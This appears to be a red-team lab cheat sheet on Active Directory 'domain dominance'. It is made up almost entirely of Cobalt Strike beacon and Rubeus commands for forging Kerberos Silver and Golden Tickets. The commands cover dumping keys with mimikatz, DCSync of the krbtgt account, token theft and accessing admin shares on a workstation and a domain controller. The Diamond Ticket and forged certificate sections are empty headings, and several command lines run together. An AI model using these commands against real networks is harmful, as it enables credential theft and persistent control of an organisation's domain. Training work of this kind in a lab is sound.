Domain Dominance
Technique
Protocol
1) Silver Ticket (Offline)
beacon> mimikatz !sekurlsa:ekeysPS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:cifs/wkstn-1.dev.cyberbotic.io /aes256:<aes256> /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrapbeacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFXD[...]MuaW8= beacon> steal_token 5668 beacon> ls \\wkstn-1.dev.cyberbotic.io\c$
2) Golden Ticket (Offline)
beacon> dcsync dev.cyberbotic.io DEV\krbtgtPS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<aes256> /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrapbeacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFLz[...snip...]MuaW8= beacon> steal_token 5060 beacon> run klist beacon> ls \\dc-2.dev.cyberbotic.io\c$
3) Diamond Ticket (Online)
4) Forged Certificates (DC or CA Server)
Last updated